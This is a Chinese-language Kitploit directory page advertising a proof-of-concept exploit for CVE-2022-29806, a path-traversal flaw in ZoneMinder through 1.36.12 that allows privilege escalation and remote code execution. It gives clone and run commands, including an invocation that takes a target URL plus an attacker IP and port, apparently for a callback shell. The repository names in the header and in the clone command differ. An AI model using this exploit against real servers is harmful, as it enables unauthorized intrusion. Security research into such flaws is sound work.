Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-29806 — ZoneMinder 至 1.36.12 版本语言选项权限提升(及远程代码执行) - PoC漏洞利用 | Kitploit
工具/GitHubGitHub/sigm0n/cve-2022-29806
权限提升漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubsigm0n/cve-2022-29806

CVE-2022-29806

ZoneMinder 至 1.36.12 版本语言选项权限提升(及远程代码执行) - PoC漏洞利用

查看仓库
321年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-29806

ZoneMinder 1.36.12 及之前的语言权限提升(以及远程代码执行)

alt img

描述

在 ZoneMinder 1.36.13 和 1.37.11 之前的版本中,调试日志文件和默认语言选项存在路径遍历漏洞,允许攻击者写入并执行任意代码,从而实现远程命令执行。

“该概念验证在 ZoneMinder 1.36.4 ubuntu18.04 docker (ZoneMinder/zmdockerfiles) 上测试通过,但仍适用于最新版本 1.36.12”

用法

root@kitploit:~
git clone https://github.com/OP3R4T0R/CVE-2022-29806
cd CVE-2022-29806
python3 exploit.py
root@kitploit:~
python3 exploit.py -t <target_url> -ip <attacker_ip> -p <port>
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>

依赖项

root@kitploit:~
pip3 install beautifulsoup4
pip3 install argparse
pip3 install requests

致谢

漏洞发现者:krastanoel

下载工具